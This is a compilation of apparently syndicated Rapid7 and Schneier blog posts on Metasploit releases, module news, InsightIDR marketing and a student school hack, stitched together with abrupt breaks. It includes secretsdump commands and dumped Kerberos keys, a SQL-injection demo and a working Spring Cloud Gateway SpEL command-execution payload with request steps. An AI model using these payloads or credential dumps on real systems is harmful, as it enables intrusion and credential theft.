msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: [email protected]
Ccache version: 4

Creds: 1
  Credential[0]:
    Server: cifs/[email protected]
    Client: [email protected]
    Ticket etype: 18 (AES256)
    Key: 3436643936633032656264663030393931323461366635653364393932613763
    Ticket Length: 978
    Subkey: false
    Addresses: 0
    Authdatas: 0
    Times:
      Auth time: 2022-11-21 13:52:00 +0000
      Start time: 2022-11-21 13:52:00 +0000
      End time: 2032-11-18 13:52:00 +0000
      Renew Till: 2032-11-18 13:52:00 +0000
    Ticket:
      Ticket Version Number: 5
      Realm: WINDOMAIN.LOCAL
      Server Name: cifs/dc.windomain.local
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 2
        Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
          Times:
            Auth time: 2022-11-21 13:52:00 UTC
            Start time: 2022-11-21 13:52:00 UTC
            End time: 2032-11-18 13:52:00 UTC
            Renew Till: 2032-11-18 13:52:00 UTC
          Client Addresses: 0
          Transited: tr_type: 0, Contents: ""
          Client Name: 'Administrator'
          Client Realm: 'WINDOMAIN.LOCAL'
          Ticket etype: 18 (AES256)
          Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
          Flags: 0x50a00000 (FORWARDABLE, PROXIABLE, RENEWABLE, PRE_AUTHENT)
          PAC:
            Validation Info:
              Logon Time: 2022-11-21 13:52:00 +0000
              Logoff Time: Never Expires (inf)
              Kick Off Time: Never Expires (inf)
              Password Last Set: No Time Set (0)
              Password Can Change: No Time Set (0)
              Password Must Change: Never Expires (inf)
              Logon Count: 0
              Bad Password Count: 0
              User ID: 500
              Primary Group ID: 513
              User Flags: 0
              User Session Key: 00000000000000000000000000000000
              User Account Control: 528
              Sub Auth Status: 0
              Last Successful Interactive Logon: No Time Set (0)
              Last Failed Interactive Logon: No Time Set (0)
              Failed Interactive Logon Count: 0
              SID Count: 0
              Resource Group Count: 0
              Group Count: 5
              Group IDs:
                Relative ID: 513, Attributes: 7
                Relative ID: 512, Attributes: 7
                Relative ID: 520, Attributes: 7
                Relative ID: 518, Attributes: 7
                Relative ID: 519, Attributes: 7
              Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
              Effective Name: 'Administrator'
              Full Name: ''
              Logon Script: ''
              Profile Path: ''
              Home Directory: ''
              Home Directory Drive: ''
              Logon Server: ''
              Logon Domain Name: 'WINDOMAIN.LOCAL'
            Client Info:
              Name: 'Administrator'
              Client ID: 2022-11-21 13:52:00 +0000
            Pac Server Checksum:
              Signature: 04e5ab061c7a909a26b122c2
            Pac Privilege Server Checksum:
              Signature: 710bb183858257f41021bd7e

Metasploit has also added first-class support for the Keytab file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.

For instance, if Metasploit’s database is configured when running the secretsdump module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit’s database:

# Secrets dump
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=192.168.123.13
... omitted ...
# Kerberos keys:
Administrator:aes256-cts-hmac-sha1-96:56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01
Administrator:aes128-cts-hmac-sha1-96:df990c21c4e8ea502efbbca3aae435ea
Administrator:des-cbc-md5:ad49d9d92f5da170
Administrator:des-cbc-crc:ad49d9d92f5da170
krbtgt:aes256-cts-hmac-sha1-96:e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c
krbtgt:aes128-cts-hmac-sha1-96:ba87b2bc064673da39f40d37f9daa9da
krbtgt:des-cbc-md5:3ddf2f627c4cbcdc
... omitted ...
[*] Auxiliary module execution completed

These Kerberos encryption keys can then be exported to a new Keytab file with the admin/kerberos/keytab module:

# Export to keytab
msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab
msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab
[+] keytab saved to ./example.keytab
Keytab entries
==============

 kvno  type              principal                                   hash                                                              date
 ----  ----              ---------                                   ----                                                              ----
 1     1  (DES_CBC_CRC)  [email protected]                       3e5d83fe4594f261                                                  1970-01-01 01:00:00 +0100
 1     17 (AES128)       ADF3\[email protected]                        967ccd1ffb9bff7900464b6ea383ee5b                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  ADF3\[email protected]                        62336164643537303830373630643133                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       [email protected]                    56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
 1     17 (AES128)       [email protected]                    df990c21c4e8ea502efbbca3aae435ea                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  [email protected]                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     1  (DES_CBC_CRC)  [email protected]                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       [email protected]                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
 1     17 (AES128)       [email protected]                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  [email protected]                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
... omitted ...
[*] Auxiliary module execution completed

Once the new Keytab file is created, configure Wireshark to use the exported encryption keys under Edit -> Preferences -> Protocols -> KRB5, and enable 'Try to decrypt Kerberos blobs'. Wireshark will then attempt to decrypt Kerberos traffic automatically and highlight the packets it successfully decrypts.
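The keytab layout Wireshark consumes is straightforward. As an illustrative sketch of the common 0x0502 keytab version (not Framework code; helper names are our own), here is a round-trippable writer and reader for entries like the ones in the table above:

```python
import struct

def write_keytab_entry(principal: str, realm: str, enctype: int, key: bytes,
                       kvno: int = 1, timestamp: int = 0) -> bytes:
    """Serialize one entry in keytab format version 0x0502 (big-endian fields)."""
    components = principal.split('/')
    body = struct.pack('>H', len(components))                # component count
    body += struct.pack('>H', len(realm)) + realm.encode()   # counted realm string
    for comp in components:                                  # counted components
        body += struct.pack('>H', len(comp)) + comp.encode()
    body += struct.pack('>I', 1)                             # name type (KRB5_NT_PRINCIPAL)
    body += struct.pack('>I', timestamp)                     # entry timestamp
    body += struct.pack('>B', kvno & 0xFF)                   # 8-bit key version
    body += struct.pack('>HH', enctype, len(key)) + key      # keyblock
    return struct.pack('>i', len(body)) + body               # length-prefixed record

def dump_keytab(entries) -> bytes:
    return b'\x05\x02' + b''.join(write_keytab_entry(*e) for e in entries)

def parse_keytab(blob: bytes):
    assert blob[:2] == b'\x05\x02', 'not a version-0x502 keytab'
    off, out = 2, []
    while off < len(blob):
        (size,) = struct.unpack_from('>i', blob, off); off += 4
        end = off + size
        (ncomp,) = struct.unpack_from('>H', blob, off); off += 2
        (rlen,) = struct.unpack_from('>H', blob, off); off += 2
        realm = blob[off:off + rlen].decode(); off += rlen
        comps = []
        for _ in range(ncomp):
            (clen,) = struct.unpack_from('>H', blob, off); off += 2
            comps.append(blob[off:off + clen].decode()); off += clen
        off += 8                                 # skip name type and timestamp
        kvno = blob[off]; off += 1
        etype, klen = struct.unpack_from('>HH', blob, off); off += 4
        out.append(('/'.join(comps) + '@' + realm, etype, kvno,
                    blob[off:off + klen].hex()))
        off = end
    return out

# Round-trip an AES256 krbtgt key like the one in the dump above
key = bytes.fromhex('e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c')
print(parse_keytab(dump_keytab([('krbtgt', 'DEMO.LOCAL', 18, key)])))
```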


Certifried privilege escalation

Metasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried (CVE-2022-26923) in AD CS. The module generates a valid certificate impersonating the Domain Controller (DC) computer account, then uses that certificate to authenticate to the target as the DC account via the PKINIT pre-authentication mechanism. The module retrieves and caches the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.

Updated show options support

Prior to Metasploit 6.3, the show options and show advanced commands displayed a module’s supported options in a single flat list.

Now module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting them to the user.


Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can download the latest release through our nightly installers, or, if you are a git user, clone the Metasploit Framework repo (master branch) for the latest release.

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.

2022 Annual Metasploit Wrap-Up

Post Syndicated from Spencer McIntyre original https://blog.rapid7.com/2022/12/30/2022-metasploit-wrap-up/


It’s been another gangbusters year for Metasploit, and the holidays are a time to give thanks to all the people that help make our load a little bit lighter. So, while this end-of-year wrap-up is a highlight reel of the headline features and extensions that landed in Metasploit-land in 2022, we also want to express our gratitude and appreciation for our stellar community of contributors, maintainers, and users. The Metasploit team merged 824 pull requests across Metasploit-related projects in 2022, more than 650 of which were incorporated into the main metasploit-framework repository. If you fixed a typo, linked a new reference, or cleaned up some code spaghetti, thank you!

Active Directory Certificate Services attacks

For years now, penetration testers and attackers have emphasized Active Directory as a particularly juicy and valuable attack surface area. In 2021, we saw fresh attack research that outlined new techniques for targeting Active Directory Certificate Services, or AD CS, including multiple configuration flaws that can be leveraged to escalate permissions from a domain user to a privileged account. In response to requests from our user community, Metasploit released two modules in the second half of 2022 that support AD CS attack techniques:

  • auxiliary/gather/ldap_esc_vulnerable_cert_finder can be used by an authenticated AD user to enumerate Certificate Authorities (CAs) and find vulnerable certificate templates.
  • auxiliary/admin/dcerpc/icpr_cert allows users to issue certificates from AD CS with a few options that are used for exploiting some escalation (ESC) scenarios. Currently only escalation technique 1 (ESC1) can be exploited with the available options, but support for more techniques is planned.
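For a sense of what the cert finder is checking: ESC1 hinges on a template that low-privileged users can enroll in, that lets the enrollee supply the subject (and therefore an arbitrary SAN), and that yields a certificate usable for authentication. A hedged sketch of that predicate follows (flag and OID values from public AD CS research; the function is illustrative, not the module's code):

```python
# Values from public AD CS research / [MS-CRTD]; illustrative only.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag bit

# Extended key usages that make a certificate usable for authentication
CLIENT_AUTH_EKUS = {
    '1.3.6.1.5.5.7.3.2',       # Client Authentication
    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
    '2.5.29.37.0',             # Any Purpose
}

def looks_like_esc1(name_flags: int, ekus: set, low_priv_can_enroll: bool) -> bool:
    """ESC1: low-privileged enrollment + enrollee-supplied SAN + auth-capable cert."""
    auth_capable = not ekus or bool(ekus & CLIENT_AUTH_EKUS)  # empty EKU = any purpose
    return (low_priv_can_enroll
            and bool(name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
            and auth_capable)
```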

Linux credential extraction with Mimipenguin

Metasploit expanded our post-exploitation capabilities for extracting plaintext credentials on Linux systems by porting the Mimipenguin utility to Metasploit. This allows users to extract credentials for a variety of services from an established Meterpreter session, including the gnome-keyring-daemon, vsftpd and sshd. Under the hood, this functionality uses a new Meterpreter API that allows searching through process memory.

Metasploit plays well with others

This year Metasploit added a few different ways of supporting interoperability with other offensive security tools. First up is the BOF Loader for COFF files, which enables usage of Cobalt Strike’s Beacon Object File format from within the Windows Meterpreter. This extension can also use BOF files written for Sliver. We’ve also made an improvement this year to allow users to bring their own payloads and stages from other tools and formats. If you’re a Sliver user, you can now deploy a Sliver agent as a custom payload stage, and we will use our own Metasploit stagers to upload and run the custom shellcode on the target.
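For the curious, a BOF is just a COFF object file, so loading one starts with the 20-byte COFF file header defined in the PE/COFF specification. A small illustrative parser (not the extension's actual loader):

```python
import struct

# The 20-byte COFF file header, little-endian, per the PE/COFF specification:
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
COFF_HEADER = struct.Struct('<HHIIIHH')
IMAGE_FILE_MACHINE_AMD64 = 0x8664

def parse_coff_header(blob: bytes) -> dict:
    (machine, nsections, _timestamp, symtab_offset,
     nsymbols, _opt_size, characteristics) = COFF_HEADER.unpack_from(blob, 0)
    return {'machine': machine, 'sections': nsections,
            'symbols': nsymbols, 'symtab_offset': symtab_offset,
            'characteristics': characteristics}
```

A loader like the BOF extension then walks the section and symbol tables that follow this header, applies relocations, and calls the requested entry point.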

Holiday hacking challenge

Metasploit teamed up with TryHackMe to deliver a challenge as part of their Advent of Cyber event, which ran for the month of December. The Metasploit challenge debuted on December 9 and walked users through a fun Christmas-themed story where they were able to use some of Metasploit’s latest pivoting capabilities. A walk-through is available under Task 9 on the official event page.

Sixth getsystem technique

Metasploit added a new technique to everyone’s favorite Meterpreter command in the middle of 2022 with help from cdelafuente-r7, who incorporated the newest named-pipe impersonation-based technique (the EfsPotato variant). This technique works on Windows Vista / Server 2008 and later and can be executed entirely in memory to escalate the current session to NT AUTHORITY\SYSTEM without spawning a new process. For more information about this and other getsystem techniques, check out the new module documentation. (Pro tip: Specific techniques can be used by number!)

Post API improvements and maintenance

Community member bcoles made more than 100 pull requests to improve and maintain the post-exploitation API used by Metasploit’s 400+ post modules. This enormous effort is greatly appreciated: it has fixed numerous bugs, added new functionality, and made general improvements that benefit end users and module developers alike. Among those improvements are removing quite a few lingering Meterpreter scripts (which were replaced by post modules in 2011) and adding shell session support for a few enumeration modules. The shell session support is particularly useful when combined with 2021’s payload-less session improvements because it bypasses the need to address evasion with Meterpreter.

New contributors

We would like to thank the community for all the work done this year. Particularly, we want to give a big shout out to the 45 new contributors that added great content to Metasploit. Some of these folks even added modules for celebrity vulnerabilities or flaws that were being actively exploited in the wild, such as Apache Spark RCE (CVE-2022-33891), Spring Cloud Gateway RCE (CVE-2022-22947) or Spring Framework RCE (CVE-2022-22965). We’re grateful to all our contributors for submitting modules that help organizations test their defenses, demonstrate risk, and prioritize mitigations.

New contributor    # of modules
---------------    ------------
h00die-gr3y        5
krastanoel         4
npm-cesium137-io   4
Ayantaker          1
PazFi              1
c0rs               1
giacomo270197      1
jerrelgordon       1
m4lwhere           1
mauricelambert     1
rad10              1
talhakarakumru     1
usiegl00           1
vleminator         1

Others contributed to make Metasploit even better with enhancements, fixes and documentation:

New contributors
3V3RYONE
AtmegaBuzz
EmilioPanti
ILightThings
Invoke-Mimikatz
NikitaKovaljov
ORelio
Ronni3X
VanSnitza
bojanisc
darrenmartyn
dismantl
entity0xfe
erikbomb
flogriesser
kalidor
lap1nou
llamasoft
luisfso
mauvehed
memN0ps
mrshu
namaenonaimumei
nfsec
nzdjb
ojasookert
om3rcitak
r3nt0n
rtpt-alexanderneumann
shoxxdj
ssst0n3
zha0gongz1

New module highlights

  • exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 – This exploit contributed by community member heyder facilitated unauthenticated code execution on multiple Fortinet products including FortiOS, FortiProxy and FortiSwitchManager.
  • exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 – Despite having a 2021 CVE, this particular vulnerability, contributed by community member h00die-gr3y, gained attention in 2022 for being an unauthenticated RCE in VMware’s NSX product. Being a deserialization vulnerability, exploitation is smooth and reliable.
  • auxiliary/gather/ldap_query – This new module allows users to gather useful information from an Active Directory Domain Services (AD DS) LDAP server. Metasploit currently includes 28 predefined queries for common actions like enumerating LAPS passwords, computer accounts, and users with configured Service Principal Names (SPNs) for Kerberoasting. Metasploit users can even define their own queries for use with the module.
  • exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc – This module, from community contributor h00die, added in support for CVE-2021-22015. vCenter is frequently targeted by attackers, so h00die’s contribution goes a long way in helping pen testers better assess the security of vCenter servers during their engagements.
  • exploit/linux/http/cisco_asax_sfr_rce – This module was added by jbaines-r7 and incorporated an exploit for CVE-2022-20828 that allows authenticated attackers to gain root-level shells on vulnerable Cisco ASA-X devices with FirePOWER Services enabled. These devices are frequently positioned in sensitive pivots within networks, and are prime targets for attackers, so gaining RCE on these devices often results in access to privileged networks and/or data.
  • exploit/multi/veritas/beagent_sha_auth_rce – This module from community contributor c0rs exploits CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent to bypass authentication and gain remote code execution as SYSTEM/root. This is quite a nice vulnerability: backup agents typically have access to sensitive company data, and combining that access with SYSTEM/root privileges as an unauthenticated remote user makes this a solid path for gaining initial access to a network and pivoting to other segments of it.

Version 6.2 released

Over the summer, the Metasploit team announced the release of Metasploit Framework 6.2, which included a number of new features. Some of the highlights:

  • A streamlined authentication capturing plugin
  • An SMB 2 and 3-capable file server
  • Improved options for handling NATed services
  • Improved SMB relaying

We’re planning a 6.3 feature release in early 2023, so stay tuned for the next round of new Metasploit capabilities and improvements!

E-Z-2-contribute documentation

As of the 6.2 release, Metasploit has a new, user-contributable docs site at https://docs.metasploit.com/. Want to contribute to Metasploit, but don’t want to monkey around with Ruby or exploit code? We can always use more and better documentation on your favorite Metasploit features, workflows, and improvements. Get in there and help us teach people how hacking works!

From all of us at Rapid7, we wish you a very happy new year. As always, you can get the latest Metasploit updates every Friday in our weekly wrap-up, and you can stay up-to-date on vulnerability intelligence with AttackerKB.

Metasploit Wrap-Up

Post Syndicated from Zachary Goldman original https://blog.rapid7.com/2022/12/09/metasploit-wrap-up-156/

Login brute-force utility


Jan Rude added a new module that gives users the ability to brute-force logins for Linux Syncovery. This expands Framework’s login-scanning capabilities to cover Syncovery, a popular web GUI for backups.

WordPress extension SQL injection module

Cydave, destr4ct, and jheysel-r7 contributed a new module that exploits a vulnerable WordPress plugin. This allows Framework users to leverage CVE-2022-0739, a UNION-based SQL injection, to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page also has access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn’t a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.
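The underlying bug class is easy to demonstrate. The following is a generic sqlite3 sketch of a UNION-based injection, not the actual BookingPress query; table and column names are invented for illustration:

```python
import sqlite3

conn = sqlite3.connect(':memory:')
conn.executescript("""
CREATE TABLE appointments (id INTEGER, service TEXT);
INSERT INTO appointments VALUES (1, 'haircut');
CREATE TABLE wp_users (user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES ('admin', 'fake-phpass-hash');
""")

def vulnerable_lookup(service_id: str):
    # String concatenation instead of a parameterized query: the bug class.
    sql = "SELECT id, service FROM appointments WHERE id = " + service_id
    return conn.execute(sql).fetchall()

print(vulnerable_lookup("1"))  # [(1, 'haircut')]
# The injected UNION must match the column count (2); it then appends rows
# from an unrelated table to the result set the page renders.
print(vulnerable_lookup("1 UNION SELECT user_login, user_pass FROM wp_users"))
```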

New module content (3)

Enhancements and features (2)

  • #17214 from h00die – This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
  • #17332 from bcoles – Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).

Bugs fixed (5)

  • #17183 from rbowes-r7 – This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. In particular, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
  • #17305 from cgranleese-r7 – Updates Metasploit’s RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
  • #17323 from h00die – Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
  • #17330 from zeroSteiner – This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
  • #17342 from gwillcox-r7 – This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.
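For background on that last fix: the control in question is likely the LDAP_SERVER_SD_FLAGS_OID (1.2.840.113556.1.4.801) control, whose BER-encoded value selects which parts of the security descriptor the server returns; requesting everything except the SACL lets non-privileged users read the rest. A sketch of encoding that value (illustrative, not Framework code):

```python
# Security-descriptor parts selectable via the SD-flags control
OWNER, GROUP, DACL, SACL = 0x1, 0x2, 0x4, 0x8

def sd_flags_control_value(flags: int) -> bytes:
    """BER-encode SEQUENCE { INTEGER flags } for LDAP_SERVER_SD_FLAGS_OID."""
    assert 0 <= flags <= 0x7F  # a one-byte INTEGER covers all four flag bits
    integer = bytes([0x02, 0x01, flags])           # INTEGER tag, length, value
    return bytes([0x30, len(integer)]) + integer   # SEQUENCE wrapper

# Owner + group + DACL, but no SACL: readable without admin rights
print(sd_flags_control_value(OWNER | GROUP | DACL).hex())  # 3003020107
```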

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2022/10/14/metasploit-wrap-up-155/

Spring Cloud Gateway RCE


This week, @Ayantaker added a new module that exploits a code injection vulnerability in Spring Cloud Gateway (CVE-2022-22947). Versions 3.1.0 and 3.0.0 to 3.0.6 are vulnerable if the Gateway Actuator endpoint is enabled, exposed, and unsecured. The module sends a specially crafted SpEL expression to this endpoint and gets command execution as the user running Spring Cloud Gateway. A first request creates a route with a filter containing the SpEL expression, which is parsed with a StandardEvaluationContext; a second request reloads the route and triggers code execution.
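Based on the public proof-of-concept pattern for CVE-2022-22947 (the module's exact requests may differ; the route id, command, and URI below are placeholders), the crafted route looks roughly like this:

```python
import json

route_id = 'example-route'   # placeholder route name
command = 'id'               # command to execute on the gateway host

# SpEL expression that runs a command and captures its output (public PoC pattern)
spel = ('#{new String(T(org.springframework.util.StreamUtils).copyToByteArray('
        'T(java.lang.Runtime).getRuntime().exec(new String[]{"%s"})'
        '.getInputStream()))}' % command)

# Step 1: POST this to /actuator/gateway/routes/<route_id> to create the route.
create_route = {
    'id': route_id,
    'filters': [{'name': 'AddResponseHeader',
                 'args': {'name': 'Result', 'value': spel}}],
    'uri': 'http://127.0.0.1',
}
body = json.dumps(create_route)
# Step 2: POST /actuator/gateway/refresh so the SpEL expression is evaluated.
# Step 3: GET /actuator/gateway/routes/<route_id> to read the command output,
#         then DELETE the route and refresh again to clean up.
```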

pfSense pfBlockerNG plugin unauthenticated RCE

Our very own @jheysel-r7 added a module that exploits an OS command injection vulnerability, identified as CVE-2022-31814, in pfSense’s pfBlockerNG plugin versions 2.1.4_26 and below. The module sends an HTTP request with a payload in the Host: header, which is executed by PHP’s exec() function. This leads to unauthenticated remote command execution as root. Note that this plugin is not installed by default on pfSense, but it is commonly used to block inbound connections from countries or IP ranges.

New module content (2)

  • Spring Cloud Gateway Remote Code Execution by Ayan Saha, which exploits CVE-2022-22947 – A new module has been added in for CVE-2022-22947, an unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.
  • pfSense plugin pfBlockerNG unauthenticated RCE as root by IHTeam and jheysel-r7, which exploits CVE-2022-31814 – A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfBlockerNG plugin for pfSense that allows remote unauthenticated attackers to execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions <= 2.1.4_26 are vulnerable. Note that version 3.x is unaffected.

Enhancements and features (2)

  • #17123 from h00die – The netrc and fetchmail modules have been updated to include documentation on how to use the modules.
  • #17092 from bcoles – This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

Bugs fixed (3)

  • #16987 from jmartin-r7 – Improves scanner/smb/smb_login to gracefully handle additional error conditions when connecting to target services.
  • #17075 from cdelafuente-r7 – The Windows secrets dump module was failing early for non-administrative users. This fix replaces those early failures with warnings, so the module can now complete the DOMAIN action where it previously stopped before reaching that point.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

A SIEM With a Pen Tester’s Eye: How Offensive Security Helps Shape InsightIDR

Post Syndicated from Rapid7 original https://blog.rapid7.com/2022/10/14/a-siem-with-a-pen-testers-eye-how-offensive-security-helps-shape-insightidr/


To be great at something, you have to be a little obsessed. That’s true whether you want to be a chess grandmaster, become an internationally recognized CEO, or build the best cybersecurity platform on the planet.

At Rapid7, our laser-focus has always been trained on one thing: helping digital defenders spot and stop bad actors. From the start of our story, penetration testing — or pen testing, for short — has been one of the cornerstones of that obsession. The offensive security mindset influenced the way we built and designed InsightIDR, our cloud-native XDR and SIEM.

On the offensive

Before we ever released InsightIDR, there was Metasploit, an open-source pen testing framework. Originally developed by HD Moore, Metasploit allows offensive security teams to think like attackers and infiltrate their own organizations’ environments, pushing the boundaries to see where their systems are vulnerable. Those insights help the business identify the most serious issues to prioritize and patch, remediate, or mitigate.

Offensive security strategies provide a much-needed foundation for assessing your risk landscape and staying a step ahead of threats — but the task of building and operationalizing a security strategy doesn’t end there.

“The biggest misconception about pen testing that I hear repeatedly is, ‘We’re going to pen-test to test our response time or test our tools,'” says Jeffrey Gardner, Rapid7’s Practice Advisor for Detection and Response. “That’s not the purpose of a pen test.”

Pen testing is a critical step in understanding where and how your organization is vulnerable to attackers, and what kinds of activities within your environment might indicate a breach. This is essential information for setting up the detections that your security operations center (SOC) team needs in order to effectively safeguard your systems against intrusion — but they also need a tool that lets them set up those detections, so they can get alerts based on what matters most for your organization’s specific environment.

Pen testing itself isn’t that tool, nor does it test the effectiveness of the tools you have. Rather, pen testing looks for your weaknesses – and once they’re found, looks for ways to exploit them, including using stolen credentials to move across the network.

Mapping how bad actors behave

That’s where the importance of having a security information and event management (SIEM) solution built with offensive security in mind comes in — and that’s exactly what our years of experience helping organizations run pen tests and analyze their attack surface have allowed us to build. InsightIDR is a unified SIEM and XDR platform designed with a pen tester’s eye. And the key to that design is user and entity behavior analytics (UEBA).

See, the problem with detecting attackers in your network is that, to the human eye, they can look a lot like regular users. Once they’ve hacked a password or stolen login credentials through a phishing/scam attack, their activities can look relatively unremarkable — until, of course, they make the big move: a major escalation of privilege or some other vector that allows them to steal sensitive data or upend systems entirely.

It takes years of experience understanding how attackers behave once they penetrate networks — and the subtle ways those patterns differ from legitimate users — to be able to catch them in your environment. This is exactly the type of expertise that Rapid7 has gained through 10+ years of in-the-trenches penetration testing experience, executed through Metasploit. Everything we learned about UEBA went into InsightIDR.

InsightIDR continuously baselines healthy user activity in the context of your specific organization. This way, the tool can spot suspicious activity fast — including lateral movement and the use of compromised credentials — and generate alerts so your team can respond swiftly. This detections-first approach means InsightIDR comes with a deep level of insight that’s based on years of studying the attacker, as well as an understanding of what alerts matter most to SOC teams.
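As a toy illustration of the baselining idea (this is not InsightIDR's actual algorithm, just a sketch of the concept), a per-user baseline can flag activity that deviates sharply from historical behavior:

```python
from statistics import mean, stdev

def is_anomalous(history, observed, threshold=3.0):
    """Flag an observation more than `threshold` standard deviations away
    from the user's historical mean (a toy z-score baseline)."""
    mu, sigma = mean(history), stdev(history)
    if sigma == 0:
        return observed != mu
    return abs(observed - mu) / sigma > threshold

# Daily count of privileged actions for one account over two weeks
baseline = [2, 3, 2, 4, 3, 2, 3, 2, 3, 4, 2, 3, 3, 2]
print(is_anomalous(baseline, 3))   # a typical day
print(is_anomalous(baseline, 40))  # a sudden privilege-heavy burst
```

Real UEBA systems model many more signals (logon times, asset pairs, lateral movement paths), but the principle is the same: learn what normal looks like per entity, then alert on deviation.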

Watch a free demo today to see InsightIDR’s attacker-spotting power in action.

High-School Graduation Prank Hack

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/08/high-school-graduation-prank-hack.html

This is a fun story, detailing the hack a group of high school students perpetrated against an Illinois school district, hacking 500 screens across a bunch of schools.

During the process, the group broke into the school’s IT systems; repurposed software used to monitor students’ computers; discovered a new vulnerability (and reported it); wrote their own scripts; secretly tested their system at night; and managed to avoid detection in the school’s network. Many of the techniques were not sophisticated, but they were pretty much all illegal.

It has a happy ending: no one was prosecuted.

A spokesperson for the D214 school district tells WIRED they can confirm the events in Duong’s blog post happened. They say the district does not condone hacking and the “incident highlights the importance of the extensive cybersecurity learning opportunities the District offers to students.”

“The District views this incident as a penetration test, and the students involved presented the data in a professional manner,” the spokesperson says, adding that its tech team has made changes to avoid anything similar happening again in the future.

The school also invited the students to a debrief, asking them to explain what they had done. “We were kind of scared at the idea of doing the debrief because we have to join a Zoom call, potentially with personally identifiable information,” Duong says. Eventually, he decided to use his real name, while other members created anonymous accounts. During the call, Duong says, they talked through the hack and he provided more details on ways the school could secure its system.

EDITED TO ADD (9/13): Here’s Minh Duong’s Defcon slides. You can see the table of contents of their report on page 59, and the school’s response on page 60.

Announcing Metasploit 6.2

